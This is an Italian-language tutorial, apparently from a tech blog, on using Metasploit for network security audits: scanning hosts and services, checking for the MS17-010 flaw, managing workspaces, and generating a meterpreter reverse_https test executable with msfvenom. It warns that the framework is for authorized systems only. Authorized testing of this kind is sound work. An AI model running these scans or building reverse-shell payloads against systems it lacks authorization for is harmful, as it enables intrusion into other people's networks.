PassioniInformaticaSicurezza

Guida: Metasploit Framework — security testing professionale

26/02/2026

Il framework di security testing più usato al mondo

1. Avvio

# Inizializza il database
msfdb init

# Avvia la console
msfconsole

2. Workflow base

# Ricerca moduli
msf6> search type:auxiliary name:scanner

# Seleziona un modulo
msf6> use auxiliary/scanner/portscan/tcp

# Configura
msf6> set RHOSTS 192.168.1.0/24
msf6> set THREADS 50

# Esegui
msf6> run

3. Moduli utili per audit

# Scanner SSH
use auxiliary/scanner/ssh/ssh_version
set RHOSTS 192.168.1.0/24
run

# Scanner SMB
use auxiliary/scanner/smb/smb_version

# Scanner HTTP
use auxiliary/scanner/http/http_version

# Verifica vulnerabilità note
use auxiliary/scanner/smb/smb_ms17_010

4. Database e workspace

# Crea workspace per progetto
msf6> workspace -a homelab-audit

# Mostra host scoperti
msf6> hosts

# Mostra servizi
msf6> services

# Esporta report
msf6> hosts -o /tmp/hosts.csv

5. Msfvenom per payload di test

# Genera agent di test per verifica antivirus
msfvenom -p windows/meterpreter/reverse_https LHOST=192.168.1.53 LPORT=4443 -f exe -o test_agent.exe

IMPORTANTE: Usare solo su sistemi propri e autorizzati. Mai su reti altrui.

Risultato: Framework completo per audit di sicurezza professionale dell’infrastruttura.

← Guida: Burp Suite — analisi sicurezza applicazi... Guida: OpenVAS — vulnerability scanner enterprise →
← Torna all'elenco